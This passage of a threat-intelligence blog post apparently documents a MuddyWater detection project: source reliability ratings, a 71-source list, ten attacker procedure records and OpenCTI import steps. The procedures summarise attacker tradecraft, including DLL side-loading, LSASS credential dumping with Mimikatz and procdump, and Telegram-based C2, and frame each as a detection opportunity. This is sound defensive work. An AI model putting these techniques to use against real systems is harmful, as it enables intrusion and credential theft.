href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-reliability-evidence-assessment.md"><strong>source-reliability-evidence-assessment.md</strong></a> — Analyst review notes: reliability ratings, evidence quality, promotion decisions, and limitations per source.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/tree/main/docs/source-gathering/raw-sources"><strong>raw-sources/</strong></a> — 71 numbered source folders, each containing metadata.json, headers.txt, the raw source file, extracted source.txt, and fallback reader output.</li></ul><h4><strong>Promoted sources (highest weight):</strong></h4><ul><li><strong>CISA AA22–055A (Feb 2022)</strong> — Full procedure survey: PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin; WMI survey script; credential dumping tools.</li><li><strong>INCD 2023</strong> — Israeli campaign specifics: ScreenConnect/SimpleHelp RMM abuse, Egnyte/OneDrive lures, Log4j + Exchange exploitation.</li><li><strong>INCD 2024</strong> — BugSleep analysis: 43-minute scheduled task beacon, VPN exploitation, new RMM tools (Level, PDQConnect).</li></ul><p>Supporting vendor sources: ClearSky, Deep Instinct, Group-IB, Mandiant, Proofpoint, Sekoia.io, Symantec.</p><h4>Why These Three Have the Highest Weight</h4><p>The reliability assessment used a two-axis rubric: <strong>Source Reliability (A–F)</strong> separating publication discipline from content, and <strong>Information Credibility (1–6)</strong> rating how well each claim is grounded.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*672ETgk4DFDJDE0G2-sLgA.png"></figure><p><strong>CISA AA22–055A — Reliability A, Credibility 2</strong></p><p>This is a joint advisory signed by five national authorities: CISA, FBI, CNMF, NCSC-UK, and NSA. That multi-agency co-signature is not ceremonial — each agency must independently agree to the technical content before it publishes. The advisory names specific malware families (PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin), includes an actual WMI PowerShell survey script attributed to MuddyWater, and lists credential-dumping tool names. Evidence label: Reported / Assessed. The PDF acquired locally at raw-sources/07-u-s-cyber-command-defense-media-aa22-055a-pdf-mirror/source.pdf is the authoritative copy distributed via Defense Media Activity. Credibility is 2, not 1, because the advisory states TTPs based on intelligence assessment rather than a single intercepted artifact — but the authority behind that assessment is as high as public-source CTI gets.</p><p><strong>INCD 2023 (MuddyWater / DarkBit PDF) — Reliability A, Credibility 2</strong></p><p>The Israel National Cyber Directorate is the government authority responsible for civilian cyber defense in Israel, the primary target country for this actor. This report covers a specific Israeli campaign including: tool names (ScreenConnect, SimpleHelp), file-sharing lure services (Egnyte, OneDrive), exploitation of Log4j and Exchange CVE-2020–0688, and deployment of ransomware (DarkBit) as a cover operation. Evidence label: Observed / Reported / Assessed. The "Observed" label means the INCD had direct visibility into the incident — not a secondary summary. This gives procedure-level specificity that generic vendor threat intel doesn't reach. Acquired at raw-sources/17-israel-national-cyber-directorate-muddywater-darkbit-pdf/source.pdf.</p><p><strong>INCD 2024 (BugSleep PDF) — Reliability A, Credibility 2</strong></p><p>Same publisher authority as INCD 2023, focused on MuddyWater’s 2024 evolution. Key content: BugSleep backdoor analysis, the specific 43-minute scheduled task beacon interval (which became proc_mw_0006 and det_mw_0006), VPN exploitation, and new RMM tools (Level, PDQConnect). The 43-minute interval is a concrete behavioral fingerprint — not a general TTP category — and it came from direct INCD analysis. Evidence label: Observed / Reported / Assessed. Acquired at raw-sources/18-israel-national-cyber-directorate-technological-advancement-and-evolution-of-muddywater-in/source.pdf.</p><p>The three sources share a common characteristic: they are not secondary aggregators or vendor marketing. They are government authorities with direct incident visibility reporting on specific Israeli campaigns.</p><h4>Steps After Deduplication: What Actually Happened to All 71 Sources</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XeokisYTU_DGw6UH7bLB3w.png"></figure><p>After the AI outputs were merged and deduplicated, 71 candidate sources remained. Here is what happened to them across Steps 5–9:</p><p><strong>Step 5 — Automated Acquisition</strong></p><p>tools/fetch_research_sources.py ran against all 71 URLs. For each source it created a numbered folder under docs/source-gathering/raw-sources/ with:</p><pre>raw-sources/<br>  01-mitre-att-ck-muddywater-g0069/<br>    metadata.json        # URL, fetch timestamp, HTTP status, content-type, size<br>    headers.txt          # Raw HTTP response headers<br>    source.html / source.pdf / source.txt   # Primary file<br>    source.txt           # Text extract (for PDFs and HTML)<br>    fallback-reader.txt  # Reader-mode fallback if primary was blocked or JS-rendered</pre><p>Not all fetches succeeded. Some sources returned 403 (vendor gating), some required JS rendering (only fallback text was captured), and two PDFs were corrupted. The acquisition report at docs/source-gathering/source-acquisition-report.md records the HTTP status, file size, and extraction status for all 71.</p><p><strong>Step 6 — Reliability and Credibility Rating</strong></p><p>Each acquired source was rated using the two-axis rubric. The full assessment table is in docs/source-gathering/source-reliability-evidence-assessment.md. Outcome breakdown:</p><ul><li>Reliability A (government / primary standard): 23 sources</li><li>Reliability B (usually reliable vendor / research publisher): 25 sources</li><li>Reliability C (secondary / news / marketing): 18 sources</li><li>Reliability F (failed acquisition or cannot judge): 5 sources</li></ul><p><strong>Step 7 — Promotion Decision</strong></p><p>Only sources with a combination of Reliability A or B, Credibility 2 or better, a usable acquisition, and at least one procedure-level claim were promoted into data/sources.yaml. The rest were assigned one of: Use as corroboration, Use as comparison only, Defer, or Exclude.</p><p>71 candidates → 8 primary sources promoted into the dataset. The 63 that were not promoted are retained in raw-sources/ for future work; they are not discarded.</p><p><strong>Step 8 — Claim Extraction</strong></p><p>For each promoted source, specific claims were extracted with source binding and evidence labels. A claim is not “MuddyWater uses PowerShell” — it is: “CISA AA22–055A (AA22–055A PDF, p.4) reports that MuddyWater actors deploy PowGoop, a DLL loader that decrypts and executes a PowerShell backdoor (Reported)." This source-bound format prevents claim drift downstream.</p><p><strong>Step 9 — Procedure Candidate Extraction</strong></p><p>From the bound claims, 10 procedure candidates were grouped by tactic: Initial Access, Execution, Persistence, Defense Evasion, Discovery, C2, Credential Access. Each candidate recorded: required telemetry, detection opportunity, whether lab validation was feasible, and whether the procedure appeared in multiple independent sources (a promotion signal for higher confidence scores later).</p><h4>The Full 71-Source Candidate List</h4><p>This is the deduplicated list produced after comparing Gemini and OpenAI outputs. Every source here was an acquisition target for Step 5.</p><p><strong>Core MuddyWater / Seedworm / TA450 / Mango Sandstorm</strong></p><ol><li><a href="https://attack.mitre.org/groups/G0069/">MITRE ATT&amp;CK — MuddyWater G0069</a></li><li><a href="https://attack.mitre.org/software/S0223/">MITRE ATT&amp;CK — POWERSTATS S0223</a></li><li><a href="https://attack.mitre.org/software/S1046/">MITRE ATT&amp;CK — PowGoop S1046</a></li><li><a href="https://www.cisa.gov/news-events/alerts/2022/02/24/iranian-government-sponsored-muddywater-actors-conducting-malicious">CISA alert — Iranian Government-Sponsored MuddyWater Actors Conducting Malicious Cyber Operations</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A advisory page</a></li><li><a href="https://www.cisa.gov/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A PDF</a></li><li><a href="https://media.defense.gov/2022/Feb/24/2002944274/-1/-1/0/CSA_AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.PDF">U.S. Cyber Command / Defense media — AA22–055A PDF mirror</a></li><li><a href="https://www.ncsc.gov.uk/news/joint-advisory-observes-muddywater-actors-conducting-cyber-espionage">NCSC-UK — Joint advisory on MuddyWater actor</a></li><li><a href="https://www.iranwatch.org/sites/default/files/cybercom_muddywater_press_release.pdf">U.S. Cyber Command / Iran Watch mirror — Iranian intel cyber suite of malware PDF</a></li><li><a href="https://duo.com/decipher/us-cyber-command-discloses-muddywater-malware-samples">Decipher — US Cyber Command Discloses MuddyWater Malware Samples</a></li><li><a href="https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/">SentinelOne — Wading Through Muddy Waters</a></li><li><a href="https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/">Palo Alto Unit 42 — Muddying the Water: Targeted Attacks in the Middle East</a></li><li><a href="https://radar.certfa.com/en/insights/cluster/fe272810/">CERTFA Radar — MuddyWater Threat Actor Cluster</a></li><li><a href="https://radar.certfa.com/en/threats/view/d7c9c420/">CERTFA Radar — MuddyWater / Earth Vetala Intrusion</a></li><li><a href="https://www.group-ib.com/masked-actors/muddywater/">Group-IB — MuddyWater APT Group Profile</a></li></ol><p><strong>Israel-Focused MuddyWater Sources</strong></p><ol><li><a href="https://www.gov.il/en/pages/_muddywater">Israel National Cyber Directorate — MuddyWater page</a></li><li><a href="https://www.gov.il/BlobFolder/news/_muddywater/en/government%20threat%20actor.pdf">Israel National Cyber Directorate — MuddyWater / DarkBit PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/maddy_water_2024/en/ALERT_CERT_IL_W_1858.pdf">Israel National Cyber Directorate — Technological Advancement and Evolution of MuddyWater in 2024 PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/alert_1947/he/ALERT-CERT-IL-W-1947.pdf">Israel National Cyber Directorate — Overview of Recent Phishing PDF</a></li><li><a href="https://www.clearskysec.com/operation-quicksand/">ClearSky — Operation Quicksand: MuddyWater’s Offensive Attack Against Israeli Organizations</a></li><li><a href="https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf">ClearSky — Operation Quicksand PDF</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/">Microsoft — MERCURY and DEV-1084: Destructive attack on hybrid environment</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/">Microsoft — Exposing POLONIUM activity and infrastructure targeting Israeli organizations</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign">Proofpoint — TA450 Uses Embedded Links in PDF Attachments in Latest Campaign</a></li><li><a href="https://harfanglab.io/insidethelab/muddywater-rmm-campaign/">HarfangLab — MuddyWater campaign abusing Atera Agents</a></li><li><a href="https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework">Deep Instinct — DarkBeatC2: The Latest MuddyWater Attack Framework</a></li><li><a href="https://www.scworld.com/brief/novel-c2-tool-leveraged-in-latest-muddywater-attacks">SC Media — Novel C2 tool leveraged in latest MuddyWater attacks</a></li><li><a href="https://blog.checkpoint.com/research/muddywater-threat-group-deploys-new-bugsleep-backdoor/">Check Point — MuddyWater Threat Group Deploys New BugSleep Backdoor</a></li><li><a href="https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/">ESET / WeLiveSecurity — MuddyWater: Snakes by the riverbank</a></li><li><a href="https://www.eset.com/uk/about/newsroom/press-releases/iran-muddywater-critical-infrastructure-israel-egypt-snake-game-eset-research-uk/">ESET press release — Iran’s MuddyWater targets critical infrastructure in Israel and Egypt</a></li><li><a href="https://securityaffairs.com/185244/apt/muddywater-strikes-israel-with-advanced-muddyviper-malware.html">Security Affairs — MuddyWater strikes Israel with advanced MuddyViper malware</a></li><li><a href="https://thehackernews.com/2024/03/iran-linked-muddywater-deploys-atera.html">The Hacker News — Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks</a></li></ol><p><strong>Recent / Evolving MuddyWater Activity</strong></p><ol><li><a href="https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix">Proofpoint — Around the World in 90 Days: State-Sponsored Actors Try ClickFix</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/crossed-wires-case-study-iranian-espionage-and-attribution">Proofpoint — Crossed Wires: a case study of Iranian espionage and attribution</a></li><li><a href="https://www.group-ib.com/blog/muddywater-operation-olalampo/">Group-IB — Operation Olalampo: Inside MuddyWater’s Latest Campaign</a></li><li><a href="https://thehackernews.com/2026/02/muddywater-targets-mena-organizations.html">The Hacker News — MuddyWater Targets MENA Organizations with GhostFetch, CHAR, and HTTP_VIP</a></li><li><a href="https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware/">Rapid7 — Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware</a></li><li><a href="https://thehackernews.com/2026/05/muddywater-uses-microsoft-teams-to.html">The Hacker News — MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware Attack</a></li><li><a href="https://www.rapid7.com/research/iran-conflict-cyber-threats/">Rapid7 — Iran Conflict Cyber Threat Intelligence</a></li><li><a href="https://www.extrahop.com/blog/the-digital-front-of-iranian-cyber-offensive-and-defensive-response">ExtraHop — The Digital Front of Iranian Cyber Offensive and Defensive Response</a></li><li><a href="https://abnormal.ai/blog/iran-aligned-cyber-operations-email-threats">Abnormal Security — Tracking Iran-Aligned Cyber Operations Following U.S.-Israel Strikes</a></li><li><a href="https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/">Unit 42 — Boggy Serpens Threat Assessment</a></li><li><a href="https://hivepro.com/threat-advisory/muddywater-irans-adaptive-cyber-espionage-machine/">Hive Pro — MuddyWater: Iran’s Adaptive Cyber Espionage Machine</a></li><li><a href="https://hivepro.com/wp-content/uploads/2026/03/TA2026082.pdf">Hive Pro — MuddyWater / Operation Olalampo PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2024/10/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2024-en.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2024 PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2025/09/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2025-en-2.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2025 PDF</a></li><li><a href="https://documents.trendmicro.com/assets/pdf/Annual_APT_Report_2025.pdf">Trend Micro — Annual APT Report 2025 PDF</a></li><li><a href="https://go.intel471.com/hubfs/Emerging%20Threats/2025%20Emerging%20Threats/Upd%20HUNTER%20-%20Iranian%20Threat%20Actor%20Coverage.pdf">Intel 471 — HUNTER Iranian Threat Actor Coverage PDF</a></li></ol><p><strong>Iran Threat Context and Comparison Actors</strong></p><ol><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran">CISA — Iran Threat Overview and Advisories</a></li><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors/iran/publications">CISA — Iran state-sponsored cyber threat publications</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a">CISA — AA23–335A: IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors</a></li><li><a href="https://www.cisa.gov/sites/default/files/2023-12/aa23-335a-irgc-affiliated-cyber-actors-exploit-plcs-in-multiple-sectors-1.pdf">CISA — AA23–335A PDF</a></li><li><a href="https://attack.mitre.org/groups/G0049/">MITRE ATT&amp;CK — APT34</a></li><li><a href="https://attack.mitre.org/groups/G0059/">MITRE ATT&amp;CK — APT35 / Charming Kitten</a></li><li><a href="https://attack.mitre.org/groups/G1030/">MITRE ATT&amp;CK — Agrius</a></li><li><a href="https://www.microsoft.com/en-us/security/security-insider/mint-sandstorm">Microsoft — Mint Sandstorm</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/">Microsoft — Peach Sandstorm deploys new custom Tickler malware</a></li><li><a href="https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-threat-actor-naming?view=o365-worldwide">Microsoft Learn — How Microsoft names threat actors</a></li><li><a href="https://www.sentinelone.com/blog/sentinelone-intelligence-brief-iranian-cyber-activity-outlook/">SentinelOne — Iranian Cyber Activity Outlook</a></li><li><a href="https://mirror.gpmidi.net/vx-underground/Malware%20Analysis/2024/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability/Paper/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability.pdf">Trellix — The Iranian Cyber Capability PDF</a></li></ol><p><strong>OpenCTI / STIX / Knowledge Graph References</strong></p><ol><li><a href="https://docs.opencti.io/latest/usage/data-model/">OpenCTI documentation — Data model</a></li><li><a href="https://docs.opencti.io/latest/reference/api/">OpenCTI documentation — GraphQL API</a></li><li><a href="https://docs.opencti.io/latest/usage/deduplication/">OpenCTI documentation — Deduplication</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/stix-v2.1.html">OASIS — STIX 2.1 HTML specification</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/cs02/stix-v2.1-cs02.pdf">OASIS — STIX 2.1 PDF specification</a></li><li><a href="https://stixproject.github.io/documentation/concepts/relationships/">STIX Project — Relationships</a></li><li><a href="https://arxiv.org/abs/2303.09999">STIXnet — Extracting STIX Objects in CTI Reports</a></li><li><a href="https://arxiv.org/abs/2507.16576">From Text to Actionable Intelligence: Automating STIX Entity and Relationship Extraction</a></li><li><a href="https://arxiv.org/abs/2605.15904">Context-aware Entity-Relation Extraction for Threat Intelligence Knowledge Graphs</a></li></ol><p><strong>Validate Before Promoting</strong></p><ol><li><a href="https://brandefense.io/wp-content/uploads/2025/10/brandefense.io-muddywater-iran-linked-espionage-group-expanding-global-reach-muddywater-.pdf">Brandefense — MuddyWater PDF</a></li><li><a href="https://assets.kpmg.com/content/dam/kpmgsites/in/pdf/2022/07/KPMG_CTI_Report_muddy.pdf.coredownload.inline.pdf">KPMG — CTI Report MuddyWater PDF</a></li></ol><p><strong>Critical discipline:</strong> AI output was used only for source discovery. Every claim, mapping, and detection record required analyst review before entering the dataset.</p><h3>Phase 2: Procedure Dataset</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ji8MQqr4SpW620AV3QN67A.png"></figure><p>A procedure record is not an ATT&amp;CK technique. ATT&amp;CK describes what a class of actors <em>can</em> do. A procedure record describes what <em>this actor</em> did, in <em>this campaign</em>, as documented by <em>this source</em>, with a specific evidence label attached.</p><p>The distinction matters for detection. “Adversaries use scheduled tasks (T1053.005)” does not help you tune a detection rule. “BugSleep creates a scheduled task with a 43-minute repeat interval (INCD 2024, Observed)” does — because you now have a concrete interval to hunt for, a specific tool name, and a source you can cite in your detection rationale.</p><p>Each of the 10 records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/procedures.yaml">data/procedures.yaml</a> captures four things:</p><ul><li>The specific behavior — not the technique category</li><li>The source references that support it, with evidence labels</li><li>Candidate ATT&amp;CK technique mappings and the reasoning behind each candidate</li><li>Required telemetry, a detection idea, validation plan, and known limitations</li></ul><h4>Confidence Labels</h4><p>Each record carries one of four evidence labels inherited from the source assessment:</p><p><strong>Observed</strong> — the behavior appears directly in source telemetry, a recovered sample, a screenshot, or a government incident report with direct visibility into the event. This is the strongest label and the only one that justifies a high-priority detection without further corroboration.</p><p><strong>Reported</strong> — a source states the behavior occurred, but the evidence is assertion-level rather than artifact-level. Still usable; requires corroboration before relying on it alone.</p><p><strong>Assessed</strong> — the source draws an analytical conclusion based on multiple indicators. Appropriate for ATT&amp;CK candidate mappings; not sufficient alone for a new detection claim.</p><p><strong>Inferred</strong> — analyst conclusion derived from combining multiple reported facts across sources. Weakest label; flag for review before using in production.</p><p>All 10 procedures in this dataset carry <strong>Observed</strong> or <strong>High</strong> confidence. That is not a coincidence — it reflects the promotion threshold. Procedures that came only from secondary or inferred sources were not promoted into data/procedures.yaml; they stayed in the claim extraction notes for future work.</p><h4>The 10 Procedures</h4><p><strong>proc_mw_0001 — Spearphishing Email Delivery</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1566.001, T1566.002, T1534</em></p><p>Three delivery variants documented across all three primary government sources: ZIP attachments containing macro-enabled Excel files or PDFs; email links to Egnyte or OneDrive delivering compressed RMM installers; and emails sent from compromised legitimate accounts to increase lure credibility. In 2024, a Microsoft-update-lure campaign sent to 10,000+ accounts embedded a PowerShell API key, granting the actor direct agent access immediately after the RMM tool installed. Three independent government sources corroborate this procedure — it is the highest-confidence initial access vector in the dataset.</p><p><strong>proc_mw_0002 — Public-Facing Exploitation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1190</em></p><p>Secondary initial access vector to phishing. Documented CVEs: CVE-2020–1472 (Netlogon/Zerologon), CVE-2020–0688 (Exchange), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities confirmed by INCD 2024. Exploitation is typically followed by RMM tool deployment or custom backdoor staging. The VPN claim from INCD 2024 does not name a specific CVE — treat as Reported until a CVE is attributed.</p><p><strong>proc_mw_0003 — PowerShell Execution and Script Obfuscation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1059.001, T1027</em></p><p>Cross-cutting technique present in every tool tier. PowGoop uses an obfuscated .dat + config.txt PowerShell chain for C2 beaconing. POWERSTATS is a persistent PowerShell backdoor. The 2024 lure embedded an API key executed via PowerShell to grant direct agent access. Obfuscation is applied consistently via Base64, XOR, and custom encoding. Detection anchor: Script Block Logging (EID 4104) is the primary telemetry dependency — without it, this procedure is nearly invisible to endpoint-only detection.</p><p><strong>proc_mw_0004 — DLL Side-Loading</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1574.002</em></p><p>PowGoop’s canonical execution method: a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load and execute the malicious DLL. INCD 2024 confirms continued use across the 2024 toolset. Detection requires Sysmon EID 7 (image load) with signing status — not available from Windows Event Log alone. This is the most telemetry-constrained procedure in the dataset; validation was PARTIAL because the lab's stub DLL did not produce sufficient EID 7 signal.</p><p><strong>proc_mw_0005 — Registry Run Key and Startup Folder Persistence</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1547.001</em></p><p>Small Sieve adds index.exe under the Run key named OutlookMicrosift — mimicking a Microsoft application name. Canopy installs its first WSF script in the startup folder. AA22-055A documents an additional key: SystemTextEncoding. INCD 2024 confirms continued use. The specific key names (OutlookMicrosift, SystemTextEncoding) are high-confidence IoCs when present; a detection based only on "new Run key written by a non-installer" will generate noise in most enterprise environments.</p><p><strong>proc_mw_0006 — Scheduled Task (43-Minute Beacon)</strong> <em>Confidence: Observed · Source: INCD 2024 (single source) · ATT&amp;CK: T1053.005</em></p><p>BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing. The interval is documented as customizable, but 43 minutes is the specific value observed in the INCD 2024 analysis. This is a single-source procedure — INCD 2024 only — which is why it carries a coverage score of 4 (correlated analytic) rather than 5 in the detection atlas. Before treating this interval as a high-confidence fingerprint in production, corroborate with a vendor source.</p><p><strong>proc_mw_0007 — RMM Tool Abuse</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024, multiple vendor sources · ATT&amp;CK: T1219</em></p><p>The most consistently documented technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple vendor sources), SimpleHelp, Level, PDQConnect (2024). The 2024 lure embedded an API key so the actor had direct agent access the moment the victim installed the tool. Detection must rely on delivery context and parent process — not binary name alone, since these are legitimate commercial tools.</p><p><strong>proc_mw_0008 — C2 via Web Protocols and DNS Tunneling</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1071.001, T1572, T1102</em></p><p>Multiple C2 channels documented. Small Sieve beacons via Telegram Bot API over HTTPS. Canopy sends collected data via HTTP POST. Blackout uses GET /questions and POST /about-us. AnchorRAT communicates over HTTPS port 443 in JSON format. Mori uses DNS tunneling. In 2024, Rentry.co was used as a legitimate platform for C2 redirection. The Telegram API is the highest-confidence detection anchor: outbound HTTPS to api.telegram.org from a non-browser process is unusual in enterprise environments and directly attributed across multiple sources.</p><p><strong>proc_mw_0009 — WMI System Discovery Survey</strong> <em>Confidence: Observed · Source: AA22–055A (script documented verbatim) · ATT&amp;CK: T1047, T1082, T1016, T1033, T1518.001</em></p><p>MuddyWater runs a PowerShell script that queries WMI to collect: IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username, and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2. The exact script is reproduced in the CISA advisory. The SecurityCenter2 query is the detection anchor: legitimate enterprise software rarely queries this WMI namespace outside AV management contexts, making it a low-noise signal.</p><p><strong>proc_mw_0010 — Credential Dumping from LSASS and Credential Stores</strong> <em>Confidence: Observed · Source: AA22–055A · ATT&amp;CK: T1003.001, T1003.004, T1003.005</em></p><p>Post-access credential access using three tools: Mimikatz and procdump64.exe against LSASS memory (T1003.001); LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005). Used post-exploitation to enable lateral movement with harvested credentials. Detection via Sysmon EID 10 (process accessing lsass.exe) is tool-agnostic — it fires regardless of whether the actor uses Mimikatz, procdump, or a custom variant with a different binary name. This is the most reliable detection path for this procedure.</p><h3>Phase 3: OpenCTI Knowledge Graph</h3><p>The procedure dataset and source register go into a self-hosted OpenCTI 6.2 instance. This creates the analytical record — queryable, relationship-aware, ATT&amp;CK-linked.</p><h3>OpenCTI Deployment</h3><p>The stack used in this project is documented and publicly reproducible. The full deployment — Docker Compose, connectors, and an AI enrichment connector that calls Claude via the Anthropic API — lives in a dedicated project:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200/opencti-intelligent-shield">github.com/anpa1200/opencti-intelligent-shield</a></li></ul><p><a href="https://github.com/anpa1200/opencti-intelligent-shield">GitHub - anpa1200/opencti-intelligent-shield: OpenCTI AI-driven threat intelligence enrichment with Claude and Docusaurus documentation</a></p><ul><li><strong>Medium guide:</strong></li></ul><p><a href="https://medium.com/@1200km/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a></p><ul><li><strong>Main guide:</strong> <a href="https://anpa1200.github.io/opencti-intelligent-shield/">anpa1200.github.io/opencti-intelligent-shield</a></li></ul><p><a href="https://anpa1200.github.io/opencti-intelligent-shield">OpenCTI AI Enrichment | The Intelligent Shield</a></p><p>The Intelligent Shield project covers: OpenCTI core stack (Redis, Elasticsearch, MinIO, RabbitMQ, platform, workers), MITRE ATT&amp;CK connector, and a custom internal enrichment connector that uses Claude to automatically summarize and enrich threat objects. Docker Compose files, a sanitized .env.example, and full setup instructions are all version-controlled.</p><p>To spin up the stack standalone (outside Operation Desert Hydra):</p><pre>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd openCTI<br>cp .env.example .env<br># fill in tokens and passwords<br>./scripts/start-all.sh   # OpenCTI at :8080<br>./scripts/stop-all.sh    # halt, preserves volumes</pre><p>In the context of Operation Desert Hydra the stack is embedded in stack/ and started with bash start.sh — no separate clone needed. The Intelligent Shield project is the standalone reference deployment for anyone who wants OpenCTI without the lab.</p><h4>Step 10: Stack Start</h4><pre>bash start.sh --skip-lab   # starts OpenCTI + Elasticsearch + Kibana only</pre><p>All 12 core containers start: Redis, Elasticsearch, MinIO, RabbitMQ, OpenCTI platform, 3 workers, and the MITRE ATT&amp;CK connector.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_8pjCgFqyge4o-bahQTX6Q.png"></figure><p><strong>Result:</strong> OpenCTI reachable at http://localhost:8080. All containers healthy.</p><h4>Step 11: MITRE ATT&amp;CK Connector Sync</h4><p>The MITRE ATT&amp;CK connector loads 846 techniques into the graph. This sync must complete before the import script can link procedures to techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k4o9xri96voJcB0EUQPqfg.png"></figure><p><strong>Result:</strong> 846 ATT&amp;CK patterns loaded. Connector state: ACTIVE.</p><h4>Step 12: Import Script</h4><p>Script: <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/tools/opencti_import.py"><strong>tools/opencti_import.py</strong></a></p><pre>export OPENCTI_URL=http://localhost:8080<br>export OPENCTI_TOKEN=&lt;admin token from stack/.env&gt;<br>python3 tools/opencti_import.py</pre><p>The script reads data/sources.yaml and data/procedures.yaml — it does not hardcode any intelligence. The YAML files are the single source of truth; the script is just a translation layer from those files into OpenCTI's API.</p><p><strong>What it creates and why:</strong></p><p><strong>Step 1 — Iran MOIS (Identity: Organization).</strong> Every object in OpenCTI needs a createdBy reference. Creating the sponsoring organization first gives all downstream objects a consistent authoring context and makes the attribution relationship explicit in the graph: MuddyWater → attributed-to → Iran MOIS.</p><p><strong>Step 2 — MuddyWater (Intrusion Set).</strong> The intrusion set object carries all known aliases: Seedworm, Mango Sandstorm, TA450, Static Kitten, TEMP.Zagros, Mercury, DEV-1084. Aliases matter for deduplication — OpenCTI uses them to avoid creating duplicate entities when the same actor appears under different names in different reports.</p><p><strong>Step 3 — Malware catalog (9 objects).</strong> Each actor-developed tool gets a Malware object with a description derived from source reporting. The catalog: POWERSTATS, PowGoop, Small Sieve, Canopy, Mori, BugSleep, AnchorRAT, SyncroRAT, DarkBit.</p><p><strong>Step 4 — Tool catalog (4 objects).</strong> Legitimate tools abused by the actor are STIX Tool objects, not Malware — the distinction matters for downstream analysis. The catalog: AteraAgent, SimpleHelp, Mimikatz, LaZagne.</p><p><strong>Step 5 — uses relationships.</strong> MuddyWater → uses → each malware and tool object. These relationships make the graph queryable: “which tools does this actor use?” returns all 13 objects in one hop.</p><p><strong>Step 6 — Reports from sources.yaml.</strong> One Report object per promoted source, with publisher, reliability rating, credibility score, actor claims, key entities, and ATT&amp;CK candidates written into the description. MuddyWater is added as an 